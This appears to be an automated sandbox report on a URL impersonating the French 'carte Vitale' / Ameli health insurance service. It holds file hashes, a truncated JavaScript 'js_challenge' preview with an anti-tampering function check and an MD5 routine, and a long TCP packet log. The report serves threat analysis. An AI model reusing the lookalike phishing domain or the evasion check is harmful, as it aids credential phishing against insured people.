                        SHA-256:F5E713A212A91DAB1C68E5F7F896C825F602EC77542CE82260DB766A3DD34C88
                        SHA-512:560A7FEC45C3153CDCE5921835134A8707BA09BBAE0D73FD979E140F93BC93F6E582FF1CEFEDB461E1A568CCF43C62B13220F4C48EDBECA13D2949890C85CB72
                        Malicious:false
                        Reputation:low
                        URL:https://cartevitale-ameli.santeassures-informations.eu/?js_challenge
                        Preview:function __interne__(){}function cif(){for(var r in __interne__(),window)if("function"==typeof window[r]){var n=window[r].toString().toLowerCase();if(-1===n.indexOf("[native code]")&&-1===n.indexOf("__interne__"))return!0}return!1}md5=function(r){var n,o,a,l,c,f,p,s,u;function _(r,n){var o,a,l,c,f;return l=2147483648&r,c=2147483648&n,f=(1073741823&r)+(1073741823&n),(o=1073741824&r)&(a=1073741824&n)?2147483648^f^l^c:o|a?1073741824&f?3221225472^f^l^c:1073741824^f^l^c:f^l^c}function d(r,n,o,a,l,c,f){return r=_(r,_(_(n&o|~n&a,l),f)),_(r<<c|r>>>32-c,n)}function g(r,n,o,a,l,c,f){return r=_(r,_(_(n&a|o&~a,l),f)),_(r<<c|r>>>32-c,n)}function C(r,n,o,a,l,c,f){return r=_(r,_(_(n^o^a,l),f)),_(r<<c|r>>>32-c,n)}function h(r,n,o,a,l,c,f){return r=_(r,_(_(o^(n|~a),l),f)),_(r<<c|r>>>32-c,n)}function m(r){var n,o="",a="";for(n=0;3>=n;n++)o+=(a="0"+(a=r>>>8*n&255).toString(16)).substr(a.length-2,2);return o}for(__interne__(),n=function(r){for(var n,o=r.length,a=16*(((n=o+8)-n%64)/64+1),l=Array(a-1),c=0,f
                        No static file info
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 3, 2024 14:38:57.700912952 CEST49674443192.168.2.6173.222.162.64
                        Jul 3, 2024 14:38:57.703639984 CEST49673443192.168.2.6173.222.162.64
                        Jul 3, 2024 14:38:57.950927973 CEST49672443192.168.2.6173.222.162.64
                        Jul 3, 2024 14:39:00.848638058 CEST49710443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:00.848694086 CEST4434971040.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:00.848767996 CEST49710443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:00.849545956 CEST49710443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:00.849562883 CEST4434971040.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:01.630498886 CEST4434971040.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:01.630573034 CEST49710443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:01.769083977 CEST49710443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:01.769104004 CEST4434971040.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:01.769397974 CEST4434971040.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:01.771425962 CEST49710443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:01.771562099 CEST49710443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:01.771569014 CEST4434971040.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:01.771733999 CEST49710443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:01.812498093 CEST4434971040.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:01.946749926 CEST4434971040.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:01.946938038 CEST4434971040.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:01.947030067 CEST49710443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:01.947119951 CEST49710443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:01.947130919 CEST4434971040.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:03.711447001 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:03.711488962 CEST4434971640.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:03.711589098 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:03.712239027 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:03.712249994 CEST4434971640.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:03.946515083 CEST49717443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:03.946543932 CEST44349717188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:03.946605921 CEST49717443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:03.946871042 CEST49718443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:03.946878910 CEST44349718188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:03.946923018 CEST49718443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:03.947144985 CEST49718443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:03.947154045 CEST44349718188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:03.947314978 CEST49717443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:03.947325945 CEST44349717188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.412004948 CEST44349718188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.412242889 CEST49718443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.412252903 CEST44349718188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.413300037 CEST44349718188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.413352013 CEST49718443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.414522886 CEST49718443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.414585114 CEST44349718188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.414776087 CEST49718443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.414784908 CEST44349718188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.415127993 CEST44349717188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.415318012 CEST49717443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.415327072 CEST44349717188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.416353941 CEST44349717188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.416418076 CEST49717443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.417299032 CEST49717443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.417367935 CEST44349717188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.467928886 CEST49717443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.467942953 CEST44349717188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.467955112 CEST49718443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.514467001 CEST49717443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.525748014 CEST4434971640.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:04.525815010 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:04.530013084 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:04.530025005 CEST4434971640.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:04.530306101 CEST4434971640.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:04.532506943 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:04.532562017 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:04.532573938 CEST4434971640.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:04.532676935 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:04.551429987 CEST44349718188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.551520109 CEST44349718188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.551563978 CEST49718443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.552361012 CEST49718443192.168.2.6188.114.96.3
                        Jul 3, 2024 14:39:04.552375078 CEST44349718188.114.96.3192.168.2.6
                        Jul 3, 2024 14:39:04.576492071 CEST4434971640.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:04.711894989 CEST4434971640.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:04.713120937 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:04.713135958 CEST4434971640.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:04.713151932 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:04.713311911 CEST4434971640.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:04.713330030 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:04.714832067 CEST49716443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:05.312530041 CEST49721443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:05.312570095 CEST44349721102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:05.312633038 CEST49721443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:05.312963963 CEST49721443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:05.312973976 CEST44349721102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:06.099718094 CEST44349721102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:06.100404024 CEST49721443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:06.100414038 CEST44349721102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:06.101571083 CEST44349721102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:06.101635933 CEST49721443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:06.104628086 CEST49721443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:06.104737043 CEST44349721102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:06.104978085 CEST49721443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:06.104985952 CEST44349721102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:06.151967049 CEST49721443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:06.225343943 CEST49722443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:39:06.225374937 CEST44349722142.250.186.164192.168.2.6
                        Jul 3, 2024 14:39:06.225421906 CEST49722443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:39:06.226059914 CEST49722443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:39:06.226068974 CEST44349722142.250.186.164192.168.2.6
                        Jul 3, 2024 14:39:06.521784067 CEST44349721102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:06.522238016 CEST44349721102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:06.522291899 CEST49721443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:06.524292946 CEST49721443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:06.524313927 CEST44349721102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:06.896606922 CEST44349722142.250.186.164192.168.2.6
                        Jul 3, 2024 14:39:06.896985054 CEST49722443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:39:06.896996021 CEST44349722142.250.186.164192.168.2.6
                        Jul 3, 2024 14:39:06.899204016 CEST44349722142.250.186.164192.168.2.6
                        Jul 3, 2024 14:39:06.899328947 CEST49722443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:39:07.024904013 CEST49722443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:39:07.025127888 CEST44349722142.250.186.164192.168.2.6
                        Jul 3, 2024 14:39:07.026933908 CEST49723443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:07.026978016 CEST44349723102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.027075052 CEST49723443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:07.028551102 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:07.028554916 CEST49723443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:07.028568029 CEST44349723102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.028579950 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.030941010 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:07.031167984 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:07.031183958 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.082982063 CEST49722443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:39:07.082994938 CEST44349722142.250.186.164192.168.2.6
                        Jul 3, 2024 14:39:07.127988100 CEST49722443192.168.2.6142.250.186.164
                        Jul 3, 2024 14:39:07.312693119 CEST49674443192.168.2.6173.222.162.64
                        Jul 3, 2024 14:39:07.312693119 CEST49673443192.168.2.6173.222.162.64
                        Jul 3, 2024 14:39:07.561655998 CEST49672443192.168.2.6173.222.162.64
                        Jul 3, 2024 14:39:07.801734924 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.814491034 CEST44349723102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.829519987 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:07.829530954 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.830992937 CEST49723443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:07.831023932 CEST44349723102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.831088066 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.831480026 CEST44349723102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.835711956 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:07.835954905 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.840380907 CEST49723443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:07.840461969 CEST44349723102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.842011929 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:07.884489059 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:07.886923075 CEST49723443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.117027998 CEST49725443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:08.117069006 CEST443497252.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:08.117373943 CEST49725443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:08.120501995 CEST49725443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:08.120526075 CEST443497252.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:08.357219934 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.357245922 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.357254028 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.357264042 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.357285976 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.357326984 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.357346058 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.357369900 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.357392073 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.522519112 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.522543907 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.522597075 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.522610903 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.522658110 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.600827932 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.600863934 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.600914001 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.600931883 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.600967884 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.600990057 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.674364090 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.674422026 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.674434900 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.674451113 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.674500942 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.674604893 CEST49724443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:08.674618006 CEST44349724102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:08.775616884 CEST443497252.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:08.775760889 CEST49725443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:08.778110981 CEST49725443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:08.778126001 CEST443497252.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:08.778388977 CEST443497252.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:08.822794914 CEST49725443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:09.226341009 CEST49723443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:09.231779099 CEST44349705173.222.162.64192.168.2.6
                        Jul 3, 2024 14:39:09.231863976 CEST49705443192.168.2.6173.222.162.64
                        Jul 3, 2024 14:39:09.268501997 CEST44349723102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:09.298362970 CEST49725443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:09.340500116 CEST443497252.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:09.440056086 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:09.440099955 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:09.440171003 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:09.440509081 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:09.440519094 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:09.490283966 CEST443497252.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:09.490963936 CEST443497252.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:09.491096020 CEST49725443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:09.704916954 CEST44349723102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:09.713696003 CEST44349723102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:09.713809967 CEST49723443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:09.717262030 CEST49723443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:09.717287064 CEST44349723102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:09.733048916 CEST49727443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:09.733083963 CEST44349727102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:09.733141899 CEST49727443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:09.737874985 CEST49727443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:09.737890005 CEST44349727102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:09.758495092 CEST49725443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:09.758511066 CEST443497252.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:09.858623028 CEST49728443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:09.858665943 CEST443497282.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:09.858742952 CEST49728443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:09.859512091 CEST49728443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:09.859524012 CEST443497282.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:10.190800905 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.209147930 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.209184885 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.209744930 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.218323946 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.218477964 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.218933105 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.264502048 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.489913940 CEST443497282.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:10.489995003 CEST49728443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:10.491446972 CEST49728443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:10.491456985 CEST443497282.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:10.491718054 CEST443497282.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:10.493000984 CEST49728443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:10.532001972 CEST44349727102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.532293081 CEST49727443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.532310009 CEST44349727102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.532661915 CEST44349727102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.532994986 CEST49727443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.533044100 CEST44349727102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.533463955 CEST49727443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.540493965 CEST443497282.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:10.576492071 CEST44349727102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.674541950 CEST49730443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.674577951 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.674648046 CEST49730443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.674854040 CEST49730443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.674863100 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.681443930 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.681474924 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.681493998 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.681520939 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.681533098 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.681560040 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.681581974 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.741750002 CEST49727443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.741879940 CEST44349727102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.741939068 CEST49727443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.760077000 CEST443497282.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:10.760173082 CEST443497282.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:10.760227919 CEST49728443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:10.792083979 CEST49728443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:10.792121887 CEST443497282.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:10.792140007 CEST49728443192.168.2.62.18.97.153
                        Jul 3, 2024 14:39:10.792146921 CEST443497282.18.97.153192.168.2.6
                        Jul 3, 2024 14:39:10.798847914 CEST49731443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:10.798861027 CEST44349731104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:10.798960924 CEST49731443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:10.802155972 CEST49731443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:10.802170992 CEST44349731104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:10.834543943 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.834578991 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.834623098 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.834638119 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.834681988 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.835484982 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.835532904 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.835541010 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.835563898 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:10.835601091 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.848073006 CEST49726443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:10.848088026 CEST44349726102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:11.270005941 CEST44349731104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:11.282552958 CEST49731443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:11.282568932 CEST44349731104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:11.283627033 CEST44349731104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:11.283687115 CEST49731443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:11.285331964 CEST49731443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:11.285392046 CEST44349731104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:11.285615921 CEST49731443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:11.285623074 CEST44349731104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:11.331679106 CEST49731443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:11.405581951 CEST44349731104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:11.405698061 CEST44349731104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:11.405747890 CEST49731443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:11.412966013 CEST49731443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:11.412988901 CEST44349731104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:11.417347908 CEST49732443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:11.417393923 CEST44349732104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:11.417453051 CEST49732443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:11.417779922 CEST49732443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:11.417798996 CEST44349732104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:11.431432962 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:11.431711912 CEST49730443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:11.431739092 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:11.432899952 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:11.432960987 CEST49730443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:11.440130949 CEST49730443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:11.440253019 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:11.440577030 CEST49730443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:11.440599918 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:11.495220900 CEST49730443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:11.539305925 CEST49733443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:11.539347887 CEST4434973340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:11.539403915 CEST49733443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:11.540523052 CEST49733443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:11.540538073 CEST4434973340.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:11.568386078 CEST49734443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:11.568438053 CEST4434973440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:11.568489075 CEST49734443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:11.569540977 CEST49734443192.168.2.640.113.103.199
                        Jul 3, 2024 14:39:11.569556952 CEST4434973440.113.103.199192.168.2.6
                        Jul 3, 2024 14:39:11.872575045 CEST44349732104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:11.916101933 CEST49732443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:12.035897017 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:12.035919905 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:12.035928965 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:12.035948038 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:12.035955906 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:12.035962105 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:12.036011934 CEST49730443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:12.036041021 CEST44349730102.48.55.178192.168.2.6
                        Jul 3, 2024 14:39:12.036086082 CEST49730443192.168.2.6102.48.55.178
                        Jul 3, 2024 14:39:12.048798084 CEST49732443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:12.048825979 CEST44349732104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:12.049365044 CEST44349732104.17.2.184192.168.2.6
                        Jul 3, 2024 14:39:12.052576065 CEST49732443192.168.2.6104.17.2.184
                        Jul 3, 2024 14:39:12.052649975 CEST44349732104.17.2.184192.168.2.6
